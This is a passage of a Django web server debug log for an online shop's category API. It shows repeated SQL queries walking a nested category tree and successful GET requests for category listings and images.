"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:37:53,506 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:37:53,508 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:37:53,510 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:37:53,512 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:37:53,514 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:37:53,518 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:37:53,520 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:37:53,522 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:37:53,524 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:37:53,527 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:37:53,529 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:37:53,532 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:37:53,534 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:37:53,536 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:37:53,539 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:37:53,541 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:37:53] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:37:58] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:37:58] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 13:37:58] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 13:37:58] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 13:37:58] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 13:37:58] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 13:38:03] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 13:38:03] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 13:38:06] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 13:38:07] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 DEBUG 2019-12-19 13:39:56,769 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:39:56,783 utils 4252 140031503103744 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-19 13:39:56,789 utils 4252 140031721535232 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:39:56,795 utils 4252 140031503103744 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:39:56,796 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:39:56,801 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [19/Dec/2019 13:39:56] "GET /api/v1/categories/12 HTTP/1.0" 200 209 DEBUG 2019-12-19 13:39:56,807 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:39:56,812 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:39:56,816 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:39:56,820 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:39:56,824 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:39:56,830 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:39:56,834 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:39:56,838 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:39:56,841 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:39:56,845 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:39:56,851 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:39:56,855 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:39:56,858 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:39:56,862 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:39:56,866 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:39:56,873 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:39:56,877 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:39:56,880 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:39:56,884 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:39:56,888 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:39:56,892 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:39:56,898 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:39:56,903 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:39:56,907 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:39:56,912 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:39:56,916 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:39:56,922 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:39:56,927 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:39:56,931 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:39:56,935 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:39:56,939 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:39:56,946 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:39:56,950 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:39:56,954 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:39:56,958 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:39:56,962 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:39:56,966 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:39:56,971 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:39:56,975 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:39:56,979 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:39:56,984 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:39:56,988 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:39:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:39:57,289 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 